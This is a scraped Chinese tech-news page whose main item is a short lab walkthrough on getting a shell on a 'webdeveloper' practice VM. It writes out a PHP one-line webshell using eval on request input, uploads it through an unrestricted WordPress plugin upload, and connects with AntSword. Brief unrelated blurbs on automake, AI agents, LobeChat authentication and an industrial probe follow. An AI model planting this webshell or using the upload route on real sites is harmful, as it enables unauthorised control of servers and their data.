news 2026/4/18 3:42:51

利用一句话木马夺取目标网站的shell

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
利用一句话木马夺取目标网站的shell

实验准备

目标网站:webdeveloper

工具:一句话木马(shell.php)、蚁剑

实验环境:物理机、虚拟机kali

一、在kali桌面创建一个shell.php文件,写入一句话木马,如图

<?php
@eval($_REQUEST["shell"]);
?>

二、将木马上传webdeveloper网站

利用插件上传不限制文件的漏洞,选择木马文件并上传,显示"not be installed"没关系,打开网页目录:http://192.168.194.134/wp-content/uploads/2025/12/

可以发现shell.php已经下载到网页的uploads目录里:

三、在物理机利用蚁剑连接目标网站

成功连接并控制目标网站,接下来可以随意查看文件,完成目标。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/12 12:20:29

麒麟KY10系统 RPM 安装 automake-1.16.2-1.ky10.noarch 完整指南

1. 先搞清楚这是啥 这个包是 Automake​ 的一个版本&#xff0c;.noarch意思是不管你是 Intel 还是别的 CPU 架构都能装&#xff0c;只要是 Kylin OS 10&#xff08;ky10&#xff09;就行。 Automake 就是帮你生成 Makefile 的工具&#xff0c;搞源码编译会用到。 2. 准备工作…

作者头像 李华
网站建设 2026/4/17 12:29:30

快速入门:三分钟彻底搞懂生成式AI、AI Agent和Agentic AI!

简介 文章介绍了AI的三个进化层次&#xff1a;生成式AI&#xff08;问答但有知识截止&#xff09;、AI Agent&#xff08;能执行任务如订机票&#xff09;和Agentic AI&#xff08;协调多个AI协作完成复杂任务&#xff09;。AI正从"工具"变成"助手"甚至&q…

作者头像 李华
网站建设 2026/4/16 18:04:20

LobeChat认证机制扩展:集成OAuth2与JWT验证

LobeChat认证机制扩展&#xff1a;集成OAuth2与JWT验证 在如今大模型应用加速落地的背景下&#xff0c;像 LobeChat 这样的开源对话平台已不再只是个人实验工具。越来越多的企业开始将其部署于内部系统中&#xff0c;用于构建智能客服、团队知识助手或自动化工作流引擎。但随之…

作者头像 李华
网站建设 2026/3/17 13:50:40

FOSSIL AQUARIAN 9300-0002探头

Fossil Aquarian 9300-0002探头是一款专为高温高压环境设计的工业级液位监测设备&#xff0c;核心性能包括&#xff1a; ‌耐压能力‌&#xff1a;最大压力210 bar&#xff08;约3000 psi&#xff09;。‌耐温范围‌&#xff1a;最高工作温度650℃&#xff08;1200华氏度&…

作者头像 李华